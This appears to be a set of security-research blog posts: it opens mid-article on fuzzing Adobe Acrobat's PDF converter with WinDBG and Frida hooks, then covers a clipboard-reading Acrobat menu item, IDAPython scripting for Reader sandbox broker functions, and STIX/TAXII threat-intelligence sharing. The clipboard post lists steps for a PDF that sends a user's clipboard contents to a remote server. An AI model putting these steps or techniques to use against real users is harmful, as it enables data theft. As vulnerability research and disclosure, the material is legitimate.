Solid comprises quite a number of DLLs. This is no surprise, since it parses PDF files, which have a complex format structure, and supports more than seven output formats (docx, pptx, ...). We needed to isolate the relevant DLL that handles the conversion process, so we could concentrate our analysis on a specific DLL and find a fuzzing vector to abuse for in-memory fuzzing. 

By analyzing Acrobat DC with WinDBG, we can speed up the process of analyzing the Solid DLLs by learning how Acrobat DC loads them. Converting a PDF to DOCX will make Acrobat DC load the necessary DLLs from Solid.

Using WinDBG, we can monitor certain events. The one we are interested in is ModLoad, which gets logged in the command output window when the process being debugged loads a DLL. It's worth noting that we can keep a copy of WinDBG's debugger command window in a file by using the .logopen command with a path to the log file as an argument. We then convert a PDF to a Word document to exercise the relevant DLLs, and finally close the log file using .logclose to flush the buffer to the log file.

Before we view the log file, we filter it on the string `ModLoad` to find the DLLs that got loaded inside the Acrobat process, sorted by their loading order.

SaveAsRTF.api, SCPdfBridge.dll and ConverterCoreLight.dll appear to be the first DLLs loaded, and from their names we conclude that the conversion process starts with them.

Through quick static analysis we found out that their role in the conversion is as follows:

SaveAsRTF.api is an Adobe plugin. Acrobat DC plugins are DLLs that extend the functionality of Adobe Acrobat; they follow a clear interface, developed by Adobe, that allows plugin developers to register callbacks and menu items. Harnessing it would mean understanding Adobe's complex structures and plug-in system.

Adobe uses SCPdfBridge.dll to interact with ConverterCoreLight.dll: Adobe needed an adapter to prepare the arguments in a form that ConverterCoreLight.dll accepts. Harnessing `SCPdfBridge.dll` is possible, but we were interested in ConverterCoreLight because it handles the conversion directly.

ConverterCoreLight.dll is the DLL responsible for converting PDF files into other formats. It does so by exporting a number of functions to SCPdfBridge.dll, mostly following C-style exports: PdfConverterCreate, PdfConverterSetOptionInt, PdfConverterSetConfiguration, and finally the function we need to target, PdfConverterConvertEx.

Recording TTD trace

Debugging a process is a common practice for understanding the functionality of complex programs. Setting breakpoints and inspecting the arguments of function calls is needed to find a fuzzing vector, yet it is time-consuming and prone to human error.

Modern debuggers like WinDBG Preview provide the ability to record execution and memory state at the instruction level. WinDBG Preview is shipped with an engine called TTD (Time Travel Debugging). TTD is an engine that allows recording the execution of a running process, then replay it later using both forward and backward (rewind) execution.

Recording a TTD Trace can be done using WinDBG Preview by attaching and enabling TTD mode. It can also be done through a command line tool:
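For instance, with the standalone command-line recorder, the attach step could look like this (the output path is a placeholder):

TTD.exe -out C:\traces -attach <pid>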

Recording a trace consumes a large amount of disk space. To overcome this, instead of recording the whole process from the beginning, we open a PDF document in Acrobat DC and, just before triggering the conversion, attach the TTD engine using the command line to capture the execution. After the conversion is done, we kill the Acrobat DC process and load the output trace into WinDBG Preview to start debugging and querying the execution that happened during the conversion. We have thus isolated the trace to contain only the relevant code we want to debug.

Since we have a TTD trace that recorded the integration of Adobe and Solid Framework, then replaying it in WinDBG allows us to execute forward or backward to understand the conversion process.

Instead of placing a breakpoint at every function exported from ConverterCoreLight.dll, we can utilize the TTD query engine to retrieve information about every call directed at ConverterCoreLight.dll by using the dx command with the appropriate LINQ query.


- Querying Calls information to ConverterCoreLight module.
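A query along these lines lists every recorded call into the module (the exact symbol pattern depends on what symbols are available):

dx -g @$cursession.TTD.Calls("ConverterCoreLight!*")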

TTD stores an object that describes every call. There are a couple of notable members we can use to understand the execution:

ThreadId: Thread Identifier

  • All function calls were executed by the same thread. 

TimeStart, TimeEnd: Function start and end positions inside the trace file.

FunctionAddress: the address of the function. Since we don't have symbols, the Function member of the object points to UnknownOrMissingSymbols.

ReturnValue: is the return value of the function upon return which usually ends up in the EAX register.

 Before analyzing every function call, we can eliminate redundant function calls made to the same FunctionAddress by utilizing the LINQ Query engine.

 

- Grouping function calls by FunctionAddress

NOTE: the output above was enriched manually by adding the symbol of every function address by utilizing the disassembly command `u` on each address.

Now we have a list of functions that handle the conversion process that we want to fuzz. Next, we need to inspect the arguments supplied to every function so that we find an argument we can target in fuzzing. Our goal is an argument that we can control and modify without affecting or corrupting the conversion process.

In this context, the user input is the PDF file to be converted. One of the things we need to figure out is how Adobe passes the PDF content to Solid for conversion. We also need to inspect the arguments passed and figure out which ones are mutation candidates.

The function calls are sorted; we won't dig deep into every call, but will briefly mention the important ones to keep it minimal. 

Function calls that are skipped:

ConverterCoreLight::ConverterCoreLight, PdfConverterSetTempRootName, ConverterCoreServerSessionUnlock,  GetConverterCoreWrapper, PdfConverterAttachProgressCallback, PdfConverterSetOptionData, PdfConverterSetConfiguration, PdfConverterGetOptionInt

Analyzing Function Calls to ConverterCoreLight

  • ConverterCoreLight!PdfConverterCreate

PdfConverterCreate takes one argument and returns an integer. After reversing sub_1000BAB0 we found out that a1 is a pointer to the SolidConverterPDF object. This object holds conversion configuration and is used as a context for future calls.

  • ConverterCoreLight!PdfConverterSetOptionInt

PdfConverterSetOptionInt is used to configure the process of conversion. By editing the settings of the conversion object, Solid allows the customization of the conversion process which affects the output. An example, is whether to use OCR to recognize text in a picture or not.


 From the arguments supplied we noticed that the first argument is always a `SolidConverterPDF` object created from `PdfConverterCreate` and passed as context to hold the configuration needed to perform the conversion. Since we want to mimic the normal conversion options we will not be changing the default settings of the conversion.

 We traced the function calls to `PdfConverterSetOptionInt` to show the default settings of the conversion.

Note: The above are default settings of Acrobat DC

  • ConverterCoreLight!PdfConverterConvertEx

PdfConverterConvertEx accepts source and destination file paths. From the debug log above, we notice that `a3` points to the source PDF file. Bingo, that can be our fuzzing vector, which we can abuse to perform in-memory fuzzing.

Testing with Frida

We have now found a potential attack vector to abuse: PdfConverterConvertEx. The function accepts six arguments; the third is the one of interest, representing the path of the source PDF file to be converted.

The next step should be easy, right? Just intercept PdfConverterConvertEx and modify the third argument to point to another file :)

Being Haboob researchers, we always like to make things fancier. We went ahead and used a DBI (Dynamic Binary Instrumentation) engine to demo a POC. Our DBI tool of choice is always Frida. Frida is a great DBI toolkit that allows us to inject JavaScript code or your own library into native apps for different platforms such as windows, iOS etc...

The Frida script we wrote intercepts PdfConverterConvertEx.
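A minimal sketch of that hook, using Frida's Python bindings with the interception logic in JavaScript (the Acrobat process name is an assumption):

import frida

session = frida.attach("Acrobat.exe")  # assumed process name
script = session.create_script("""
var convertEx = Module.getExportByName('ConverterCoreLight.dll',
                                       'PdfConverterConvertEx');
Interceptor.attach(convertEx, {
    onEnter: function (args) {
        // args[2] is the UTF-16 source PDF path; swap it with our file.
        // Keeping the allocation on `this` stops it being freed too early.
        this.newPath = Memory.allocUtf16String('C:\\\\HaboobSa\\\\Modified.pdf');
        args[2] = this.newPath;
    }
});
""")
script.load()
input()  # keep the hook alive while Acrobat runs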

Running the script above intercepts PdfConverterConvertEx: when Adobe Acrobat calls it, we change the source file path (the currently opened document) to our own path, "C:\HaboobSa\Modified.pdf". What we expect is that the exported document should contain whatever is inside Modified.pdf, not the currently opened PDF.

Sadly, that didn't work :( Solid converted the currently opened document and not the document we pointed to through Frida. So what now?

Well, during our analysis of ConverterCoreLight.dll, we noticed another exported function named PdfConverterConvert with a similar interface, differing only in the number of arguments (5 instead of 6). We added a breakpoint on that function, but the problem is that it never gets called when exporting a PDF to a Word document.

So we went back to inspect it even further in IDA:

As we can observe from the image above, both PdfConverterConvertEx and PdfConverterConvert are wrappers that differ slightly but call the same function, which does the actual conversion. We named that function pdf_core_convert.

The same arguments passed to the Ex version are passed to PdfConverterConvert, except that the sixth argument of PdfConverterConvertEx is passed as the fifth argument of PdfConverterConvert. That is because the fifth argument of the Ex version is constructed inside PdfConverterConvert itself.

In order to hijack execution over to PdfConverterConvert, we used Frida's `Interceptor.replace()` to correct the argument count (5 instead of 6) and the argument order.
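Sketched in the same Python-hosted JavaScript style (the 'int' return type and pointer-sized arguments are assumptions):

js = """
var mod = 'ConverterCoreLight.dll';
var convertEx = Module.getExportByName(mod, 'PdfConverterConvertEx');
var convert = new NativeFunction(
    Module.getExportByName(mod, 'PdfConverterConvert'),
    'int', ['pointer', 'pointer', 'pointer', 'pointer', 'pointer'], 'stdcall');

// Drop the Ex version's fifth argument and forward its sixth as
// PdfConverterConvert's fifth, as described above.
Interceptor.replace(convertEx, new NativeCallback(function (a1, a2, a3, a4, a5, a6) {
    return convert(a1, a2, a3, a4, a6);
}, 'int', ['pointer', 'pointer', 'pointer', 'pointer', 'pointer', 'pointer'], 'stdcall'));
"""

import frida
session = frida.attach("Acrobat.exe")  # assumed process name
session.create_script(js).load()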

The diagram below explains how we achieved that:

It worked :)

So, probably whatever object is in EX_arg5 was created based on the source file (the currently opened document), which is why it didn't work when we modified the source file in the Ex version, while PdfConverterConvert internally takes care of creating that object based on the source file.

Now we can create a fuzzer that hijacks execution to PDFConverterConvert with the mutated file path as source file at each restoration point during our in-memory fuzzing cycles.

In the next part of this blog post, we will implement a fuzzer based on the popular framework WinAFL. The results we achieved from in-memory fuzzing were staggering; this is how we owned Adobe's security bulletins two times in a row, back-to-back.
Until then!

Resources:

https://en.wikipedia.org/wiki/Fuzzing

https://crossbowerbt.github.io/in_memory_fuzzing.html

https://diglib.tugraz.at/download.php?id=576a78fa4aae7&location=browse

https://docs.microsoft.com/en-us/windows/win32/api/minwinbase/ns-minwinbase-debug_event

ClipBOREDication: Adobe Acrobat’s Hidden Gem

Introduction:

I’ve always enjoyed looking for bugs in Adobe Acrobat Pro DC. I’ve spent a decent amount of time looking for memory corruption bugs. Definitely exciting – but what’s even more exciting about Acrobat is looking for undocumented features that can end up being security issues.

There has been a decent amount of research into undocumented APIs and features in Adobe Acrobat. Some of those APIs allowed IO access, while others exposed memory corruption or logic issues. That said, I decided to have a look myself in the hopes of finding something interesting.

There are many ways to find undocumented features in Acrobat, varying from static and dynamic analysis using IDA along with the debugger of your choice, to analyzing JavaScript APIs from the console. Eventually, I decided to manually analyze JavaScript features from the console.

 

Menu Items:

Adobe Acrobat exposes decent capabilities that allow users and administrators to automate certain tasks through JavaScript. One specific feature is menu items. For example, if an admin wants to automate something like saving a document followed by exiting the application, this can easily be achieved using menu items.

 

For that purpose, Adobe Acrobat exposes the following API’s:

app.listMenuItems() : Dump all Menu Items

app.execMenuItem() : Execute a Menu Item

app.addMenuItem() : Add a new Menu Item with custom JS code

 

It’s always documented somewhere in code…

In their official API reference, Adobe only documented the menu items that can be executed from doc-level. Here’s a snippet of the “documented” menu items from their documentation:

Of course, this is not the complete list. Most of the juicy ones require a restrictions bypass chained with them. So, let’s dig into the list from console:

There’s quite a lot.

One specific menu item that caught my eye was "ImageConversion:Clipboard". This one does not run from doc-level and requires a restrictions bypass chained with it. The menu item is not documented and, while testing, it turned out that through it one can gain access to the clipboard through JavaScript. Sounds insane, right? Well, here's how it works:

First, the menu item uses the ImageConversion plugin. The ImageConversion plugin is responsible for converting various image formats to PDF documents. When the menu item “ImageConversion:Clipboard” is executed, the plugin is loaded, clipboard contents are accessed and a new PDF file is created using the clipboard content. Yes, all this can be done with a single JavaScript function call. We were only able to use this menu item with text content in the clipboard.

 

Sounds great, how can we exploit this?

Easy, create a PDF that does the following:

1.      Grabs the clipboard content and creates a new PDF file

2.      Accesses the newly created PDF file with the clipboard content

3.      Grabs the content from the PDF document

4.      Sends the content to a remote server

5.      Closes the newly created document

 

How does that look in JavaScript?

Of course, this POC snippet is for demo purposes and was presented as such to Adobe. No API restrictions bypass was chained with it.

No Security Implications...move on. 

We submitted this “issue” to Adobe hoping that they’ll get it fixed.

To our disappointment, their argument was that this works as designed and that there are no security implications, since it only works from a restricted context. They added that they would reconsider if a JavaScript API restrictions bypass were provided.

What that technically means is that they overly trust the application's security architecture. It is also unclear whether, if a chain were submitted, they would address this issue or just the API bypass.

To counter Adobe’s argument, we referenced a similar issue that was reported by ZDI and fixed in 2020. Adobe stated:

Of course, we went back and manually verified whether it did indeed trigger from doc-level. Our testing showed otherwise: the menu item did not work from doc-level and required a restrictions bypass. It's unclear whether there's a specific way to force that menu item to run from doc-level.

 

Do JavaScript API restrictions bypasses exist?

They did, they do, and they will probably always be around. Here's a demo of this clipboard issue chained with one. Note that this is only a demo and can definitely be refined to be stealthier. We can neither confirm nor deny that this chain uses a bypass that works on the latest version:

Disclosure Timeline:

Conclusion

It's unfortunate that Adobe decided not to fix this issue, although in the past they have fixed issues in restricted APIs that likewise required a chained JS restrictions bypass. There's a reason why "chains" exist.

This makes me wonder: will they fix other issues that require a JS restrictions bypass, like memory corruption in restricted JS APIs? Or should we expect bugs that require an ASLR bypass not to be fixed unless an ASLR bypass is provided?

Adobe closed this case as “Informative” which means dropping similar 0days for educational and informational purposes :)

 

Until next time…

 

References

http://i.blackhat.com/eu-19/Thursday/eu-19-Hariri-Tackling-Privilege-Escalation-With-Offense-And-Defense.pdf

http://dev.datalogics.com/cookbook/document/AcrobatDC_js_api_reference.pdf

https://www.zerodayinitiative.com/advisories/ZDI-20-990/

 

IDAPython Scripting: Hunting Adobe's Broker Functions

Overview

Recently, many vulnerabilities were fixed by Adobe. Almost all of those vulnerabilities fix issues in the renderer. It’s quite rare to find a bug fixed in Reader’s broker.

Our R&D Director decided to embark on an adventure to understand really what’s going on. What’s behind this beast? is it that tough to escape Adobe’s sandbox?

He spent a couple of weeks reading, reversing, and writing various tools. He spent a good chunk of his time in IDA Pro finding broker functions, marking them, renaming them, and analyzing their parameters.

Back then I had just finished working on another project and innocently asked if he needed any help. To this day, I’m still questioning whether I should have even asked ;). He turned and said: “Sure, I think it would be nice to have an IDAPython script that automatically finds all those damn broker functions”. IDAPython, what’s that? Coffee?

First, IDA Pro is one of the most commonly used reverse engineering tools. It exposes an API that allows automating reversing tasks inside the application. As the name implies, IDAPython lets you automate those reverse engineering tasks in Python.

I did eventually agree to take on this challenge - of course without knowing what I was getting myself into.

Throughout this blog post, I will talk about my IDAPython journey, especially the task I signed myself up for: writing an IDAPython script that automatically finds and flags broker functions in Acrord32.exe.

Adobe Acrobat Sandbox 101

When Acrobat Reader is launched, two processes are usually created: a broker process and a sandboxed child process. The child process is spawned with low integrity. The broker process and the sandboxed process communicate over IPC (Inter-Process Communication). The whole sandbox is based on Chromium’s legacy IPC sandbox.

The broker exposes certain functions that the sandboxed process can execute. Each function is identified by a tag and has a set of parameters. The whole architecture is well documented; see the references below.

Now the question is, how can we find those broker functions? How can we enumerate the parameters? Here comes the role of IDAPython.

Now let's get our hands dirty...

 

Scripting in IDAPython

After some research and reversing, I deduced that all the information we need is contained within the '.rdata' section. Each function, with its tag and parameters, follows a fixed pattern: 52 bytes followed by a function offset. It looks as follows:

Some bytes were bundled and defined as 'xmmword' data items by IDA’s auto-analysis.

To fix this, we could undefine those items by right-clicking each one and selecting the undefine option in IDA. Ummm... but what if there are hundreds of them? Wouldn’t that take hours? Yup, that’s definitely not efficient. The solution? You guessed it, IDAPython!

The next thing we need to do is convert all those bytes (db) to dwords (dd) and then create an array to group them together, so we get something that looks like the following:

At 0x001DE880 we have the function tag, which is 41h. At 0x001DE884 we have the parameters: 2 dup(1) (two parameters of type 1) followed by a third parameter of type 2. Finally, at 0x001DE8D4 we have the offset of the function.

Since now we know what to look for and how to do it, let’s write a pseudo-process to accomplish this task for all the broker functions:

1. Scan the '.rdata' section and undefine all unnecessary items (xmmword)

2. Scan for the pattern of the tag, parameters, and offset

3. Convert the bytes to dwords

4. Convert the dwords to an array

5. Find all the functions going forward

6. Display the results

 

The Implementation

First, we start off by writing a function that undefines xmmword instructions:

As all our work will be in the '.rdata' section, we utilize the get_segm_by_name() function from the idaapi module, which returns a segment object for the name you pass as a parameter. Using the startEA and endEA properties of the returned segment, we determine the start and end addresses of the '.rdata' section.

We scan the '.rdata' section using the GetDisasm() function, checking for any xmmword we stumble across. Once we encounter one, we apply the do_unknown() function, which undefines it.

The ItemSize() function is used to advance one item at a time.
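The original script isn’t reproduced here, but a minimal sketch of that undefine pass, assuming the legacy (pre-IDA 7) IDAPython API names the post mentions, could look like this:

import idaapi
import idc

seg = idaapi.get_segm_by_name('.rdata')      # segment object for .rdata
ea = seg.startEA
while ea < seg.endEA:
    # Undefine any item that IDA's auto-analysis bundled as an xmmword.
    if 'xmmword' in idc.GetDisasm(ea):
        idaapi.do_unknown(ea, 0)             # 0 == DOUNK_SIMPLE
    ea += max(idc.ItemSize(ea), 1)           # advance one item at a time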

Next, we check whether there are 52 bytes followed by a function offset containing the string 'sub', then pass the starting address of that pattern to the next function, convertDword().

The convertDword() function takes the start address of the pattern, converts each group of 4 bytes to a dword, and then creates an array out of those dwords.
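A sketch of how those two steps might fit together, again using the legacy API (the 52-byte stride and the 'sub' check come straight from the description above; the loop scaffolding is mine):

import idaapi
import idc

def convertDword(start_ea):
    # Turn the 52 bytes of tag + parameter data into 13 dwords...
    for off in range(0, 52, 4):
        idc.MakeDword(start_ea + off)
    # ...and group them into a single array item.
    idc.MakeArray(start_ea, 13)

seg = idaapi.get_segm_by_name('.rdata')
ea = seg.startEA
while ea < seg.endEA:
    # 52 bytes of data followed by a 'dd offset sub_XXXXXX' line marks a broker function.
    if 'sub_' in idc.GetDisasm(ea + 52):
        convertDword(ea)
    ea += max(idc.ItemSize(ea), 1)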

Having executed the previous function on the entire '.rdata' section, we end up with something similar to the following:

Next, we grab the functions and write them into a file and put them into a new window in IDAPro.

As for the argument types? Sure, here’s what each number maps to:

The next step is to scan the data section and convert all arguments type numbers to the actual type name to be displayed later.

As I mentioned before, there’s a tag of type dword, followed by the parameters (which always include dup()), followed by a function offset that always contains the 'sub' string. We split the parameters and pass the resulting list to the remove_chars() function, which removes unnecessary characters and spaces. Lastly, we pass the list to the remove_dups() function, which removes the dup() keyword and replaces it with the corresponding number of parameters (explained in a bit).

Before explaining this function, let’s explain what dup(#) means. If we have, for example, “2 dup(3)”, this means we have 2 parameters of type 3. If we have a number with dup(0), we can remove that parameter, because type 0 is invalid, as we saw earlier in the table.

That said, this function is straightforward: we iterate over the list containing all the parameters, remove all spaces and tokens like 'dd', and pop any dup(0) items from the list, returning an array with only valid parameters. The next step is to replace each dup() with as many copies of the type as the number in front of it indicates. For example, 5 dup(2) results in 2, 2, 2, 2, 2 in the array.

We iterate over the list using a regex to extract the number between the dup() parentheses and append that type the appropriate number of times, just like the example we discussed. After this, we have a list of numbers only, which we can iterate over to replace each parameter type number with its corresponding type name.
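Outside of IDA, the dup() expansion itself is plain Python; a standalone sketch (the helper name matches the post, the rest is illustrative):

import re

def remove_dups(params):
    # Expand 'N dup(T)' into N copies of type T; dup(0) entries are invalid
    # and get dropped, while plain numbers pass through unchanged.
    expanded = []
    for p in params:
        m = re.match(r'(\d+)\s*dup\((\d+)\)', p.strip())
        if m:
            count, ptype = int(m.group(1)), int(m.group(2))
            if ptype != 0:
                expanded.extend([ptype] * count)
        elif p.strip():
            expanded.append(int(p.strip()))
    return expanded

print(remove_dups(['2 dup(1)', '2']))   # [1, 1, 2] -- the example from above
print(remove_dups(['5 dup(2)']))        # [2, 2, 2, 2, 2]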

Finally, the results are written to a file. The results are also written to a new subview in IDA.

Conclusion

It was quite a ride. Maybe I should have known what I was getting myself into. Regardless, the end result was great. It’s worth noting that I ended up sending the director many output iterations with wrong results – but hey, I was able to get it right in the end!

Finally, you’ll never understand the power of IDAPython until you actually write IDAPython scripts. It definitely makes life much easier when it comes to automating RE tasks in IDA Pro.

 

Until next time..

References

Introduction to: Sharing Cyber Threat Intelligence using STIX and TAXII (Part 2)

In Part 1 of this blog series, we went over threat intelligence, from concepts and benefits to challenges and solutions. Two great solutions present themselves, STIX and TAXII, and that is what this blog post is all about.

 

So ..

What are STIX and TAXII?

•      What is STIX?
Structured Threat Information Expression (STIX™) is a language for expressing cyber threat and observable information.

•      Usage:
It is used to describe cyber threat intelligence (CTI), such as TTPs, adversary information, and indicators.

•      Versions:
The latest version is STIX 2.1, which uses JSON to describe cyber threat intelligence. Older versions (STIX 1.x) used XML.

•      STIX Features:

  1. Provides a structure that puts together a diverse set of cyber threat information, including:
    a) Cyber Observables
    b) Indicators
    c) Incidents
    d) Adversary Tactics, Techniques, and Procedures
    e) Courses of Action
    f) Threat Actors

  2. Graph-based: a tool is provided to convert STIX content to a graph, to help in the analysis process.

  3. Improves capabilities such as:
    a) Collaborative threat analysis
    b) Automated threat exchange
    c) Automated detection and response

Example of CTI in STIX format:

As you can see, it is written in JSON format. There are property names which have values; we will explain them in detail later. This sample is just to get familiar with the STIX format.
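The original JSON sample didn’t survive formatting here, but an equivalent object is easy to produce with the OASIS python-stix2 library (the indicator’s values below are illustrative):

from stix2.v21 import Indicator

indicator = Indicator(
    name="Suspicious C2 address",                   # illustrative values
    description="IPv4 address tied to adversary infrastructure",
    pattern="[ipv4-addr:value = '198.51.100.1']",   # RFC 5737 documentation IP
    pattern_type="stix",
)
print(indicator.serialize(pretty=True))             # prints the STIX 2.1 JSON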

•      What is TAXII?

Trusted Automated Exchange of Intelligence Information (TAXII™) is an application layer protocol that runs over HTTPS, used for sharing cyber threat intelligence between trusted partners. TAXII defines APIs (a set of services and message exchanges) and a set of requirements for TAXII clients and servers. There are open-source implementations in multiple programming languages.

History of STIX and TAXII:

A brief history of STIX / TAXII standards is displayed on the timeline figure below.

History of STIX / TAXII

STIX data model:

We will see how this language models threat information, meaning how it represents the threat data. It models the data with three main object types:

1. STIX Domain Objects (SDO):

Higher Level Intelligence Objects. Each of these objects corresponds to a concept commonly used in CTI.

STIX Domain Objects:

Attack pattern, Campaign, Course of Action, Grouping, Identity, Incident, Indicator, Infrastructure, Intrusion set, Location, Malware, Malware Analysis, Note, Observed Data, Opinion, Report, Threat Actor, Tool, and Vulnerability.

2. STIX Cyber-observable Objects (SCO):

For characterizing host-based and network-based observed information, such as IP addresses and domain names.

STIX Cyber-observable Objects:

Artifact, Autonomous System, Directory, Domain Name, Email Address, Email Message, File, IPv4 Address, IPv6 Address, MAC Address, Mutex, Network Traffic, Process, Software, User Account, Windows Registry Key, and X.509 Certificate.

 

3. STIX Relationship Objects (SRO):

There are two types of relationship objects:
a) Standard relationship:

A standard relationship is a link between STIX Domain Objects (SDOs), STIX Cyber-observable Objects (SCOs), or between an SDO and an SCO, and describes the way in which the objects are related.

Standard relationships:

Target, Uses, Indicates, Mitigates, Attributed to, Variant of, Impersonate, Delivers, Compromises, Originate from, Derived from, Investigates, Remediates, Located at, Based on, Communicate with, Consist of, Controls, Has, Hosts, Duplicate of, Dynamic analysis of, Exfiltrate to, Owns, Authored by, Downloads, Drops, Exploits, Characterizes, AV-analysis of, Static analysis of, Beacons to, and Related to.


b) Sighting relationship:

A sighting denotes the belief that something in CTI (malware, a threat actor, a tool) was seen. It is used to track who and what are being targeted, how attacks are carried out, trends in attack behavior, and how many times something was seen. It provides context and more descriptive information.

Example:
An indicator was seen by Haboob in a public-sector organization in the east of Saudi Arabia.

STIX to Graph

Since one of STIX’s features is that it can be converted to a graph, let’s look at an example showing all STIX object types:

STIX converted to graph

How to write CTI in STIX format:

We will see an example of writing a CTI in STIX format.

  • Writing a STIX Domain Object: Attack Pattern

The Attack Pattern domain object contains information about the TTPs an adversary uses to compromise targets.

We will convert CTI about an adversary's TTPs into a STIX Attack Pattern domain object.

Let us assume that the adversary's TTP is: Initial Access using email spear phishing.

Before writing the Attack pattern object, let us refer back to our previous example:

As we see from the STIX code example, CTI in STIX format is written as JSON, with variables (black) that have values (green); these variables are the properties. Each STIX object has properties: common properties that all objects share, and properties specific to that object. Some of these properties are required, some are optional, and each property accepts a defined input type. All STIX properties and their required inputs are documented in the official STIX standard published by the OASIS organization.

Here are the properties of the Attack Pattern object from the STIX documentation:

We will now see how to write these properties and what input they accept:

  • Common Properties:

Notice how the id property is written; the UUID here is version 4.

Also notice how the timestamp is written, where "s+" represents one or more sub-second digits. The brackets denote that sub-second precision is optional and that, if no digits are provided, the decimal point must not be present.
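As a quick illustration, both formats are easy to produce in Python (the object type here is arbitrary):

import uuid
from datetime import datetime, timezone

# id: the object type, two dashes, then a version-4 UUID.
sdo_id = "attack-pattern--" + str(uuid.uuid4())

# timestamp: RFC 3339 in UTC ("Z"), here trimmed to millisecond precision.
now = datetime.now(timezone.utc)
created = now.strftime("%Y-%m-%dT%H:%M:%S.%f")[:-3] + "Z"

print(sdo_id)    # e.g. attack-pattern--0c7b5b88-8ff7-4a4d-aa9d-feb398cd0061
print(created)   # e.g. 2022-05-12T08:17:27.000Z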

  • Specific Properties:

Notice that some specific properties are required, and some are optional.

  • Relationship objects:

These are the relationships explicitly defined between the Attack Pattern object and other STIX Objects.

Notice that there are relationships from this object to other objects, which are forward relationships, and from other objects to this object, which are reverse relationships.

STIX also allows relationships from any SDO or SCO to any SDO or SCO that are not defined in the specification, using the common relationship types. Meaning, if you can’t use the defined forward and reverse relationships to relate an attack pattern to another object, you can use a common relationship to relate them.

With the properties covered, back to our example: we will write a spear-phishing Attack Pattern with a relationship to Threat Actor X in STIX:

As we can see, code is written for two domain objects, “Attack Pattern” and “Threat Actor”, and a standard relationship object of type “uses”. Just as we consulted the specification and properties of the Attack Pattern domain object in order to write it in the correct format, we also had to go to the STIX documentation for the specification and properties of the Threat Actor domain object.
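For reference, the same two domain objects and the “uses” relationship can be built with the python-stix2 library; a minimal sketch with illustrative values:

from stix2.v21 import AttackPattern, Bundle, Relationship, ThreatActor

attack_pattern = AttackPattern(
    name="Spear Phishing",
    description="Initial access via spear-phishing emails",
)
threat_actor = ThreatActor(
    name="Threat Actor X",
    threat_actor_types=["crime-syndicate"],   # illustrative open-vocabulary value
)
# Standard relationship object of type "uses": source, type, target.
rel = Relationship(threat_actor, "uses", attack_pattern)

# Bundle all three; the JSON output can be pasted into the visualizer linked below.
print(Bundle(attack_pattern, threat_actor, rel).serialize(pretty=True))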

If we use the provided resource that converts STIX to graph, we will see this graph:

result after converting STIX to graph

The tool to convert STIX to graph can be found here:
https://oasis-open.github.io/cti-stix-visualization/

This was an example of how to write STIX CTI with two domain objects and one relationship object. To describe more objects and provide more details, we must refer back to the STIX standard documentation to learn the properties of each object, so that we write it adhering to the required specification and format.

Resources:

More resources to be used with STIX standard can be found here:
https://oasis-open.github.io/cti-documentation/resources.html

STIX transportation through TAXII:

Once the CTI is converted to STIX, it is ready to be shared. To share it, we use TAXII.

TAXII is the protocol, running over HTTPS, that is used to exchange cyber threat intelligence. It has specifications that govern this exchange, as well as two sharing models. We will cover both below.

TAXII Sharing Models:

It has two sharing models:
1- Collections:
A relationship between a producer and a consumer, consisting of a TAXII server and a TAXII client. The TAXII server hosts a repository of CTI in STIX format that a TAXII client can request. The TAXII client can only request CTI; it cannot add CTI to the server.
2- Channels:
A relationship between a publisher and subscribers, consisting of a TAXII server and TAXII clients. The TAXII server hosts a repository of CTI that TAXII clients can both request from and add to. CTI published by one TAXII client is pushed through the TAXII server to the other TAXII clients subscribed to it.

TAXII sharing models: Collections and Channels

The specification of the Channels sharing model is yet to be defined by OASIS in the TAXII standard documentation. For this reason, we will cover the specification of the Collections sharing model only.

Collections sharing model specifications:

In this sharing model, we have a TAXII server and a TAXII client that communicate over HTTPS (HTTP over TLS). Several specifications must be met in this communication:
1- Media type:

The TAXII media type is application/taxii+json, optionally carrying a version parameter (e.g. application/taxii+json;version=2.1), as shown in the request examples later.

The media type specification must be met for both the HTTP request and response.

2- Discovery:

There are two discovery methods for the TAXII server: by network, using a DNS SRV record that identifies the TAXII server hosting this service; or via a Discovery endpoint, an HTTP request to a defined URL where a client can be authenticated and authorized. “Endpoint” here refers to a specific URL for discovering the TAXII server.

The discovery URL must be named “taxii2”.

3- Authentication and Authorization:

Accessing any of the APIs on a TAXII server requires authentication. Authentication and authorization are done using HTTP Basic authentication.

4- API Roots:

An API root is a group of collections. Each API root has its own URL to be requested from. Organizing collections into API roots allows for a division of content and access control.

5- Collections:

A repository of CTI objects. Each collection has a specific URL to be requested from.

6- Objects:

The available CTI to be retrieved by the TAXII client. Each object has a specific URL to be requested from.

The following table shows examples of URLs for the specifications mentioned above.

An important note: as you can see from the tables, all request URLs end with a slash (“/”). This is also a TAXII specification.

TAXII request and response examples:

  • Discovery:

GET Request

GET /taxii2/ HTTP/1.1
Host: haboob.com
Accept: application/taxii+json;version=2.1

GET Response

  • API Roots:

GET Request

GET /api1/ HTTP/1.1
Host: haboob.com
Accept: application/taxii+json;version=2.1

GET Response

  • Collections:

GET Request
GET /api1/collections/ HTTP/1.1
Host: haboob.com
Accept: application/taxii+json;version=2.1

GET Response

  • Objects:

GET Request
GET /api1/collections/91a7b528-80eb-42ed-a74d-c6fbd5a26116/objects/ HTTP/1.1
Host: haboob.com
Accept: application/taxii+json;version=2.1

GET Response

Note: API roots, collections, and objects are all stored in an internal database on the TAXII server. The database type differs depending on the implementation of the TAXII server and is left to the developer.
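Putting the endpoints together, a minimal TAXII client pass can be sketched with Python’s requests library (haboob.com, api1, and the collection ID are the illustrative values from the examples above; a real server would require valid credentials):

import requests

BASE = "https://haboob.com"
HEADERS = {"Accept": "application/taxii+json;version=2.1"}   # TAXII media type
AUTH = ("username", "password")                              # HTTP Basic authentication

# Discovery endpoint -- must be named "taxii2", and requests end with "/".
discovery = requests.get(BASE + "/taxii2/", headers=HEADERS, auth=AUTH).json()

# API root, its collections, then the objects of one collection.
api_root = requests.get(BASE + "/api1/", headers=HEADERS, auth=AUTH).json()
collections = requests.get(BASE + "/api1/collections/", headers=HEADERS, auth=AUTH).json()

col_id = "91a7b528-80eb-42ed-a74d-c6fbd5a26116"
objects = requests.get(BASE + "/api1/collections/" + col_id + "/objects/",
                       headers=HEADERS, auth=AUTH).json()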

Resources:

There is an implementation of a TAXII server and client provided by OASIS. It can be found here:
TAXII server:
https://github.com/oasis-open/cti-taxii-server

TAXII client:
https://github.com/oasis-open/cti-taxii-client

 

Conclusion:

In this blog series we defined what CTI is and why it needs to be shared with peer organizations, and briefly went over the steps of the CTI cycle. After that, we saw the issues organizations face when sharing CTI, which resulted in the creation of the STIX and TAXII standards. Finally, we defined the STIX and TAXII standards and showed how to use them to share CTI.

 

 

References:

1. STIX 2.1 documentation:
